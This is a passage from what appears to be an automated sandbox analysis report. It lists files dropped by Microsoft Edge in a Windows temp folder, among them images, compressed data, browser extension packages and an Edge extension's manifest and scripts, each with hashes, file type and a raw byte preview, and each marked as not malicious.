                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\51f741e5-8555-4b8e-934c-4fc0185f9440.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\80cafc59-1bcf-4002-82fc-e69d8b1735b6.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):206855
                                                                                                                                                                                                                                                                              Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                              MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                              SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                              SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                              SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\8710fdc7-7802-45b0-b77f-cd469964bbb4.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):76326
                                                                                                                                                                                                                                                                              Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                              MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                              SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                              SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                              SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\8ae9d68b-aa2d-4399-b197-353299736ab5.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):154477
                                                                                                                                                                                                                                                                              Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                              MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                              SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                              SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                              SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\a8cdf628-26a1-43df-a5f5-c20a6295dfb0.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11185
                                                                                                                                                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\c25d3b31-8907-418f-b1d0-82aef76c765e.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1671779
                                                                                                                                                                                                                                                                              Entropy (8bit):7.99363219545251
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:24576:FIoRVaGFbFDEUYhR1x28472hSaFMPDqMnLLYxT5T4yUzLy1mfi5olodFsB7l:lvZDQdp4YBomMnvETh4LHy1mfixbsBJ
                                                                                                                                                                                                                                                                              MD5:C46BA1CE49F4BA890755FEC81FC0A0CE
                                                                                                                                                                                                                                                                              SHA1:532E72CE7A275133137FFAADFAE6C2E049D1AECD
                                                                                                                                                                                                                                                                              SHA-256:7B9E0705D836552D15EB5A3F26527A59BE777AE7A81DBEAB0564EFC7DE824FA3
                                                                                                                                                                                                                                                                              SHA-512:3D8538663F9A54B064120B127D85234F1BCDC178B9CBD2BB2ED05A4D9DD55C53D8D3DCBA7DF531D1AF075E5F1CEDD389670B3204EB90C8CA388A38423642A8C9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1420
                                                                                                                                                                                                                                                                              Entropy (8bit):5.405598787615201
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0hG5aF0hv5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5W
                                                                                                                                                                                                                                                                              MD5:3F4227C7AD601FDD5FC1303573D8B44F
                                                                                                                                                                                                                                                                              SHA1:50DEFB703A0070A09108CC2F6173709603C826C7
                                                                                                                                                                                                                                                                              SHA-256:BE8A7138E1C6CFE588219A93F01DA2EB0ACBA7E19D90EF098E0B49BBA777E5F3
                                                                                                                                                                                                                                                                              SHA-512:C23956F126A124CAB5118B265942B7572BE6D3E4E68E009EA4DFD3EBFEE0483D5E9A42EB0C98E8C0A6F0C42112225BEE2FAE2509281D0531CD08FCF54BB1A86B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_1421043841\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1753
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                              MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                              SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                              SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                              SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_1421043841\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9815
                                                                                                                                                                                                                                                                              Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                              MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                              SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                              SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                              SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_1421043841\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10388
                                                                                                                                                                                                                                                                              Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                              MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                              SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                              SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                              SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_1421043841\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):962
                                                                                                                                                                                                                                                                              Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                              MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                              SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                              SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                              SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_1421043841\a8cdf628-26a1-43df-a5f5-c20a6295dfb0.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11185
                                                                                                                                                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                              Malicious:false
